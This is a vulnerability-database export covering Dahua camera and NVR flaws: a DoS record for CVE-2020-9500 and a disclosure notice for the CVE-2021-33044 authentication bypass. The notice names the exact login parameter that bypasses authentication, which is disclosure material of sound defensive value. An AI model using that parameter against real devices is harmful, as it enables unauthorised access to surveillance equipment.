            model: "sd5a",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd6al",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n54a4p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hxxx5x4x",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ptz1a",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd52c",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n54b2p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hx2xxx",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hx2xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx5842h",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx7842h",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hxxx5x4x",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz1a",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd1a",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd50",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd52c",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd5a",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd6al",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 6al series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 5a series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 1a series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 50/52c series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "nvr n5x series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "nvr n4x series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc n4 series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
      ],
   },
   cve: "CVE-2020-9500",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 4,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:S/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 5,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "JVNDB-2020-003799",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "MULTIPLE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 6.1,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 6.4,
                  id: "CNVD-2020-22980",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:M/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 4.9,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 1.2,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "HIGH",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "JVNDB-2020-003799",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2020-9500",
                  trust: 1,
                  value: "MEDIUM",
               },
               {
                  author: "NVD",
                  id: "JVNDB-2020-003799",
                  trust: 0.8,
                  value: "High",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2020-22980",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202004-554",
                  trust: 0.6,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down. Dahua There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera. \n\r\n\r\nThere are security holes in many Dahua products",
      sources: [
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
      ],
      trust: 2.16,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2020-9500",
            trust: 3,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
            trust: 0.8,
         },
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   id: "VAR-202004-1824",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
      ],
      trust: 1.6,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
      ],
   },
   last_update_date: "2023-12-18T13:28:09.084000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "DHCC-SA-202004-001",
            trust: 0.8,
            url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
         },
         {
            title: "Patch for Multiple Dahua product input verification error vulnerabilities (CNVD-2020-22980)",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/213933",
         },
         {
            title: "Multiple Dahua Product input verification error vulnerability fixes",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=115747",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "NVD-CWE-noinfo",
            trust: 1,
         },
         {
            problemtype: "CWE-20",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.6,
            url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2020-9500",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9500",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2020-04-15T00:00:00",
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            date: "2020-04-24T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            date: "2020-04-09T14:15:13.260000",
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            date: "2020-04-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2020-05-12T00:00:00",
            db: "CNVD",
            id: "CNVD-2020-22980",
         },
         {
            date: "2020-04-24T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
         {
            date: "2021-07-21T11:39:23.747000",
            db: "NVD",
            id: "CVE-2020-9500",
         },
         {
            date: "2020-05-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Dahua Input verification vulnerability in",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2020-003799",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202004-554",
         },
      ],
      trust: 0.6,
   },
}

var-202109-1875
Vulnerability from variot

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]

Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole

-=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

-=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure

-=[NetKeyboard Vulnerability]=-

CVE-2021-33044

Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS

Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

